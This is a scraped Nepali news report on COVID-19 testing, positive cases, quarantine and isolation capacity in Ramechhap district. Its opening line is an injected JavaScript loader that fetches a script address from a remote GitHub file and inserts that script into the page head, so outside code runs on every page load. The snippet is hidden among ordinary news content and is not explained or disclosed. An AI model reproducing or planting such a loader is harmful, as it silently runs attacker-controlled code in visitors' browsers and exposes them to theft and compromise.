;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन १८,
रामेछाप । रामेछाप जिल्लामा आइतबारसम्मा ८९२ जनाको पीसिआर परीक्षण गरिएको छ । जसमा १८५ जना महिला र ७०७ जना पुरुष रहेका छन् । त्यस्तै १७ जनाको स्वाब संकलन गरि थप परीक्षणका लागि काठमाडौं पठाइएको भएपनि लामो समय बित्दा समेत रिपोर्ट आएको छैन् ।
हालसम्ममा जिल्लामा ५५० जनाको रिपोर्ट आएको जिल्ला अस्पताल रामेछापले विज्ञप्ति मार्फत जनाकारी दिएको छ । त्यस्तै २७ जनाको रिपोर्ट पोजेटिभ आएको छ ।
जिल्लाका छवटा पालिका तथा दुई नगरपालिकामा गरि आइतबारसम्ममा ५०९ बेडको क्वरेन्टिन तयार पारिएको जनाइएको छ । क्वारेन्टिनमा ८ महिलासहित ६२ जना मानिसहरु बसेका छन् । त्यस्तै आज मात्रै तीन जना क्वारेन्टिन अबधी पुरा गरि घर फर्कीएक छन् । त्यस्तै १०९ वेड्को आइसोलेसन तयारी अवस्थामा राखिएको छ ।
आइसोलेसनमा ४ जना बसेका छन् । भने ५९४ जनाको आइतबार सम्ममा स्वाब संकलन गरिएको छ । file Photo
फेसबुक प्रतिक्रियाहरु